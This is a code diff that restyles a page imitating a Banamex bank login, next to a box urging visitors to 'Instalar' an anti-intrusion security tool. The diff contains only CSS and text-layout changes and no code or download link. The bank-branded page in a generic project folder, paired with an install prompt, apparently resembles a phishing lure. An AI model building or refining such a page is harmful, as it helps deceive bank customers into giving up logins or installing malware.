--- a/public/banamex/index.html
+++ b/public/banamex/index.html
@@ -101,8 +101,8 @@
         .login-box {
             background: white;
             border-radius: 8px;
-            padding: 40px 40px;
-            width: 420px;
+            padding: 40px 35px;
+            width: 340px;
             box-shadow: 0 4px 20px rgba(0,0,0,0.1);
             height: fit-content;
         }
@@ -173,24 +173,22 @@
         .security-box {
             background: white;
             border-radius: 8px;
-            padding: 35px 30px;
-            width: 280px;
+            padding: 30px 35px;
+            width: 340px;
             box-shadow: 0 4px 20px rgba(0,0,0,0.1);
             height: fit-content;
         }
 
         .security-title {
             display: flex;
-            flex-direction: column;
-            align-items: center;
-            gap: 20px;
-            margin-bottom: 20px;
-            text-align: center;
+            align-items: flex-start;
+            gap: 12px;
+            margin-bottom: 15px;
         }
 
         .shield-icon {
-            width: 80px;
-            height: 80px;
+            width: 50px;
+            height: 50px;
             display: flex;
             align-items: center;
             justify-content: center;
@@ -205,19 +203,31 @@
 
         .security-text {
             color: #0c4a5e;
-            font-size: 14px;
+            font-size: 15px;
             font-weight: 600;
-            line-height: 1.7;
+            line-height: 1.4;
+            margin-top: 6px;
+        }
+
+        .security-options {
+            font-size: 13px;
+            color: #666;
+            margin-bottom: 18px;
+            line-height: 1.8;
+        }
+
+        .security-options div {
+            margin-bottom: 6px;
         }
 
         .btn-install {
             width: 100%;
-            padding: 12px;
+            padding: 14px;
             background: #0c4a5e;
             color: white;
             border: none;
             border-radius: 6px;
-            font-size: 15px;
+            font-size: 16px;
             font-weight: 600;
             cursor: pointer;
             transition: background 0.3s;
@@ -332,16 +342,6 @@
                 flex-direction: column;
                 align-items: center;
             }
-
-            .login-box {
-                width: 100%;
-                max-width: 420px;
-            }
-
-            .security-box {
-                width: 100%;
-                max-width: 320px;
-            }
         }
 
         @media (max-width: 768px) {
@@ -407,7 +407,11 @@
                     <div class="shield-icon">
                         <img src="/banamex/images/alerta-banamex.png" alt="Alerta Banamex">
                     </div>
-                    <div class="security-text">¡Protégete de fraudes cibernéticos!<br><br>Herramienta Anti-Intrusos<br><br>Más información</div>
+                    <div class="security-text">¡Protégete de fraudes cibernéticos!</div>
+                </div>
+                <div class="security-options">
+                    <div>Herramienta Anti-intrusión</div>
+                    <div>Más información</div>
                 </div>
                 <button class="btn-install" data-testid="button-install-security">Instalar</button>
             </div>
